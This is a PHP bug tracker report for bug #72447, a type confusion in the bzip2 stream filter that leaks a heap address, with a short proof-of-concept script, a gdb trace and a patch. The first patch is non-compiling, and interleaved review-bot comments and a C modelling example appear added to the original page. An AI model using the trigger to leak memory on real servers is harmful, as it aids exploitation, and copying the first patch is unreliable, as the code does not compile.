Bug #72447 Type Confusion in php_bz2_filter_create()
Submitted: 2016-06-18 17:16 UTC Modified: 2016-06-19 05:05 UTC
From: gogil at stealien dot com Assigned: sterling
Status: Closed Package: Bzip2 Related
PHP Version: 5.6.22 OS: *
Private report: No CVE-ID:
 [2016-06-18 17:16 UTC] gogil at stealien dot com
Description:
------------
Type Confusion vulnerability in php_bz2_filter_create() which leaks information.


/php$ gdb --args php-5.6.22/sapi/cli/php poc.php
Reading symbols from php-5.6.22/sapi/cli/php...done.
(gdb) b bz2_filter.c:391
Breakpoint 1 at 0x5d49e1: file /php/php-5.6.22/ext/bz2/bz2_filter.c, line 391.
(gdb) r
Starting program: /php/php-5.6.22/sapi/cli/php poc.php

Breakpoint 1, php_bz2_filter_create (
    filtername=0x7ffff7eae8c0 "bzip2.compress", filterparams=0x7ffff7fc11c0, 
    persistent=0) at /php/php-5.6.22/ext/bz2/bz2_filter.c:391
391		if (zend_hash_find(HASH_OF(filterparams), "blocks", sizeof("blocks"), (void**) &tmpzval) == SUCCESS) {
(gdb) n
395			tmp = **tmpzval;
(gdb) n
396			zval_copy_ctor(&tmp);
(gdb) n
397			convert_to_long(&tmp);
(gdb) n
398			if (Z_LVAL(tmp) < 1 || Z_LVAL(tmp) > 9) {
(gdb) n
399				php_error_docref(NULL TSRMLS_CC, E_WARNING, "Invalid parameter given for number of blocks to allocate. (%ld)", Z_LVAL_PP(tmpzval));
<---------- The Z_LVAL_PP macro is able to leak a memory address.

(gdb) n

Warning: stream_filter_append(): Invalid parameter given for number of blocks to allocate. (140737352754896) in /php/poc.php on line 6

(gdb) x/x 140737352754896
0x7ffff7eae6d0:	0x41414141




* Fix
File ext/bz2/bz2_filter.c, line 391:
	if (zend_hash_find(HASH_OF(filterparams), "blocks", sizeof("blocks"), (void**) &tmpzval) == SUCCESS) {
		/* How much memory to allocate (1 - 9) x 100kb */
		zval tmp;
	
		tmp = **tmpzval;
		zval_copy_ctor(&tmp);
		convert_to_long(&tmp);
		if (Z_LVAL(tmp) < 1 || Z_LVAL(tmp) > 9) {
-			php_error_docref(NULL TSRMLS_CC, E_WARNING, "Invalid parameter given for number of blocks to allocate. (%ld)", Z_LVAL_PP(tmpzval));
+			php_error_docref(NULL TSRMLS_CC, E_WARNING, "Invalid parameter given for number of blocks to allocate. (%ld)", Z_LVAL_PP(tmp));
		} else {
			blockSize100k = Z_LVAL(tmp);
		}
	}
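Review bot: the `+` line at the php_error_docref call applies Z_LVAL_PP to `tmp`, but `tmp` is declared as a plain `zval tmp;` and the range check two lines above already reads it as `Z_LVAL(tmp)`, so `Z_LVAL_PP(tmp)` will not compile. Suggest `php_error_docref(NULL TSRMLS_CC, E_WARNING, "Invalid parameter given for number of blocks to allocate. (%ld)", Z_LVAL(tmp));`, which reports the value after convert_to_long instead of reinterpreting the caller's original zval.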



Test script:
---------------
<?php
// poc.php
$input = "AAAAAAAA";
$param = array('blocks' => $input);

$fp = fopen('testfile', 'w');
stream_filter_append($fp, 'bzip2.compress', STREAM_FILTER_WRITE, $param);
fclose($fp);
?>


Expected result:
----------------
Warning: stream_filter_append(): Invalid parameter given for number of blocks to allocate. (0)

Actual result:
--------------
Warning: stream_filter_append(): Invalid parameter given for number of blocks to allocate. (140737352754896)
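To make the mechanism behind the gdb session above concrete, here is an added C example (not php-src code and not the reporter's) that models the PHP 5 zval as a tagged union: the Z_LVAL_PP-style read ignores the type tag and returns the string pointer's bits, while the patched path coerces first and reports 0 for "AAAAAAAA". The zval layout, enum values and all function names are simplified assumptions, and the pointer comparison assumes sizeof(long) == sizeof(char *).

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical cut-down model of a PHP 5 zval (not php-src code): a tagged
 * union whose long and string members overlap in memory. */
enum ztype { IS_LONG = 1, IS_STRING = 6 };
typedef struct {
    union {
        long lval;                          /* valid only when type == IS_LONG   */
        struct { char *val; int len; } str; /* valid only when type == IS_STRING */
    } value;
    unsigned char type;
} zval;

static zval make_string_zval(const char *s) {
    zval z = { .type = IS_STRING };
    z.value.str.len = (int)strlen(s);
    z.value.str.val = memcpy(malloc(z.value.str.len + 1), s, z.value.str.len + 1);
    return z;
}
/* Z_LVAL_PP-style read: ignores the type tag, so on a string zval the bits
 * it returns are the heap pointer held in str.val. */
static long lval_unchecked(zval **pp) { return (*pp)->value.lval; }
/* convert_to_long-style coercion: consults the tag first. A non-numeric string
 * such as "AAAAAAAA" becomes 0, which is what the Expected result prints. */
static long lval_coerced(const zval *z) {
    return z->type == IS_LONG ? z->value.lval : strtol(z->value.str.val, NULL, 10);
}
/* 1 if the unchecked read of a string zval yields its buffer address (the bug),
 * 0 otherwise. Assumes sizeof(long) == sizeof(char *), as on LP64 Linux. */
static int unchecked_read_leaks_pointer(const char *s) {
    zval z = make_string_zval(s), *pz = &z;
    long raw = lval_unchecked(&pz);
    int leaked = raw == (long)(uintptr_t)z.value.str.val && raw != lval_coerced(&z);
    free(z.value.str.val);
    return leaked;
}
/* Value the patched warning prints for a 'blocks' parameter passed as a string. */
static long coerce_param(const char *param) {
    zval z = make_string_zval(param);
    long n = lval_coerced(&z);
    free(z.value.str.val);
    return n;
}
/* The patched control flow: coerce, then range-check 1..9; -1 when invalid. */
static long validated_blocks(const char *param) {
    long n = coerce_param(param);
    return (n < 1 || n > 9) ? -1 : n;
}
```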

History

 [2016-06-18 17:37 UTC] gogil at stealien dot com
* Fix
-	php_error_docref(NULL TSRMLS_CC, E_WARNING, "Invalid parameter given for number of blocks to allocate. (%ld)", Z_LVAL_PP(tmpzval));
+	php_error_docref(NULL TSRMLS_CC, E_WARNING, "Invalid parameter given for number of blocks to allocate. (%ld)", Z_LVAL(tmp));
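Review bot: correct macro for a stack-allocated zval; `Z_LVAL(tmp)` matches the access used by the range check, and since convert_to_long has already run on `tmp`, the warning now reports the coerced value (0 for the string "AAAAAAAA", as in the Expected result) rather than the union's pointer bits read from a string-typed zval.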

Little mistake.
 [2016-06-19 05:05 UTC] stas@php.net
-Type: Security +Type: Bug -Assigned To: +Assigned To: sterling
 [2016-06-19 05:05 UTC] stas@php.net
Doesn't look like a security issue, since it requires special code to reproduce.
 [2016-06-19 05:13 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=42b2d7fec54ec7ea0bc352c502674d6192c8a6fa
Log: Fix bug #72447: Type Confusion in php_bz2_filter_create()
 [2016-06-19 05:13 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2016-06-22 05:58 UTC] krakjoe@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=42b2d7fec54ec7ea0bc352c502674d6192c8a6fa
Log: Fix bug #72447: Type Confusion in php_bz2_filter_create()
 
PHP Copyright © 2001-2017 The PHP Group
All rights reserved.
Last updated: Tue Feb 21 16:01:43 2017 UTC